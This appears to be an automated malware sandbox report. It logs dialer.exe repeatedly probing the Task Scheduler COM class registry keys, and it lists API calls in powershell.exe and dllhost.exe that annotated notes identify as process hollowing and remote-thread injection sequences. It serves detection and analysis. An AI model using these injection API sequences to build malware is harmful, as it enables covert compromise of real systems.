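Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Note: this CLSID is the Task Scheduler COM class (Schedule.Service). The TreatAs / InprocServer32 / InprocHandler / LocalServer32 / Elevation lookups repeated below are the usual COM activation probe for one class, so treat the run as a single finding (dialer.exe instantiating the scheduler) and correlate it with scheduled-task creation events. |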
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
|
Source: C:\Windows\System32\dialer.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
|
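Note: the powershell.exe entries that follow (prefixes 28_2 and 66_2) reference NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread, an API set typically associated with process hollowing. The listing shows neither call order nor the target process, so confirm against the process tree and memory-section events before concluding. |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |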
Code function: 28_2_00007FFD9B8B0FE4 NtResumeThread, |
28_2_00007FFD9B8B0FE4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8ADF98 NtUnmapViewOfSection, |
28_2_00007FFD9B8ADF98 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8B0F20 NtSetContextThread, |
28_2_00007FFD9B8B0F20 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8B0C5D NtWriteVirtualMemory, |
28_2_00007FFD9B8B0C5D |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8B0A3E NtUnmapViewOfSection, |
28_2_00007FFD9B8B0A3E |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AE078 NtUnmapViewOfSection, |
28_2_00007FFD9B8AE078 |
Source: C:\Windows\System32\dialer.exe |
Code function: 64_2_0000000140001394 NtOpenKey, |
64_2_0000000140001394 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8B1004 NtResumeThread, |
66_2_00007FFD9B8B1004 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8B0F40 NtSetContextThread, |
66_2_00007FFD9B8B0F40 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8B0C7D NtWriteVirtualMemory, |
66_2_00007FFD9B8B0C7D |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8AE0C8 NtUnmapViewOfSection, |
66_2_00007FFD9B8AE0C8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8B0A5E NtUnmapViewOfSection, |
66_2_00007FFD9B8B0A5E |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8AE098 NtUnmapViewOfSection, |
66_2_00007FFD9B8AE098 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8AE0A8 NtUnmapViewOfSection, |
66_2_00007FFD9B8AE0A8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, |
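68_2_0000000140001860 |
Note: OpenProcess, VirtualAllocEx, WriteProcessMemory and NtCreateThreadEx in a single function is the usual remote-thread injection sequence, and the token/SID calls listed before them suggest the target's account or integrity level is checked first. The identical API list recurs at 73_2_0000000140001860, also in dllhost.exe. |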
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC642990 NtEnumerateValueKey,NtEnumerateValueKey, |
69_2_00000225DC642990 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AE2604 NtQueryDirectoryFileEx,GetFileType,StrCpyW, |
70_2_00000202C0AE2604 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AE211C NtQuerySystemInformation,StrCmpNIW, |
70_2_00000202C0AE211C |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_2_000002BAAEE02990 NtEnumerateValueKey,NtEnumerateValueKey, |
72_2_000002BAAEE02990 |
Source: C:\Windows\System32\dllhost.exe |
